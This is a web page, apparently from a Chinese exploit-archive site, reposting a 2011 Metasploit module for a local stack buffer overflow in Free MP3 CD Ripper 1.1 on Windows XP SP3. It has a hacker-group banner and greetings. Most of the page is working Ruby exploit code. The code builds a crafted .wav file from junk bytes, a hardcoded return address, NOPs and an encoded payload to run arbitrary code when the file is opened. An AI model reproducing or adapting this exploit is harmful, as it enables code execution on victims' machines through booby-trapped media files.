首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit (MSF)
来源:http://facebook.com/KedAns 作者:KedAns-Dz 发布时间:2011-09-05  
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : 1337day.com                                   0
1  [+] Support e-mail  : submit[at]1337day.com                         1
0                                                                      0
1               #########################################              1
0               I'm KedAns-Dz member from Inj3ct0r Team                1
1               #########################################              0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

###
# Title : Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit (MSF)
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com | kedans@facebook.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * sec4ever.com
# Facebook : http://facebook.com/KedAns
# platform : windows
# Impact : Local Buffer Overflow
# Tested on : Windows XP SP3 (en)
##

##
# $Id: freeripper_bof.rb  2011-09-02 03:03  KedAns-Dz $
##

require 'msf/core'
 
class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking
 
  include Msf::Exploit::FILEFORMAT
 
   def initialize(info = {})
    super(update_info(info,
     'Name' => 'Free MP3 CD Ripper 1.1 Local Buffer Overflow Exploit',
	 'Description' => %q{
	  This module exploits a stack buffer overflow in version 1.1
	  creating a specially crafted .wav file, an attacker may be able 
      to execute arbitrary code.
	},
     'License' => MSF_LICENSE,
     'Author' => 
	   [
	    'X-h4ck', # Original
	    'KedAns-Dz <ked-h[at]hotmail.com>' # MSF Module
	    ],
     'Version' => 'Version 1.0',
     'References' =>
        [
         [ 'URL', 'http://exploit-db.com/exploits/17727' ],
        ],
    'DefaultOptions' =>
       {
        'EXITFUNC' => 'process',
       },
     'Payload' =>
      {
        'Space' => 1024,
        'BadChars' => "\x00\x0a\x0d",
        'StackAdjustment' => -3500,
      },
     'Platform' => 'win',
     'Targets' =>
       [
        [ 'Windows XP-SP3 (En)', { 'Ret' => 0x76B43ADC} ], # fdivr qword edx / mov ah,0x76
       ],
      'Privileged' => false,
      'DefaultTarget' => 0))
 
      register_options(
       [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.wav']),
       ], self.class)
    end
 
    def exploit

    sploit = rand_text_alphanumeric(4112) # Buffer Junk
      sploit << [target.ret].pack('V')
      sploit << make_nops(15)
      sploit << payload.encoded

      ked = sploit
      print_status("Creating '#{datastore['FILENAME']}' file ...")
      file_create(ked)

    end
 
end

#================[ Exploited By KedAns-Dz * Inj3ct0r Team * ]=====================================
# Greets To : Dz Offenders Cr3w < Algerians HaCkerS > + Rizky Ariestiyansyah * Islam Caddy <3
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re * CrosS (www.1337day.com) 
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * SeeMe * XroGuE * ZoRLu * gunslinger_ 
# anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team) * Dz Offenders Cr3w * Sec4ever
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * Ev!LsCr!pT_Dz * H-KinG * www.packetstormsecurity.org * TreX (hotturks.org)
# www.metasploit.com * UE-Team & I-BackTrack * r00tw0rm.com * All Security and Exploits Webs ..
#=================================================================================================


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BisonFTP Server v3.5 (MKD) Rem
·Desktop Recorder Local Buffer
·Cerberus FTP Server 4.0.9.8 (R
·Bison FTP Server v3.5 Multiple
·Musiccut210p Local Buffer Over
·AD Sound Recorder Local Buffer
·DragonflyBSD PortBind TCP (133
·Apple QuickTime PICT PnSize Bu
·XFtp_client Remote Buffer Over
·BroadWin WebAccess Client Mult
·Sound Editor Local Buffer Over
·DVD X Player 5.5 .plf PlayList
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved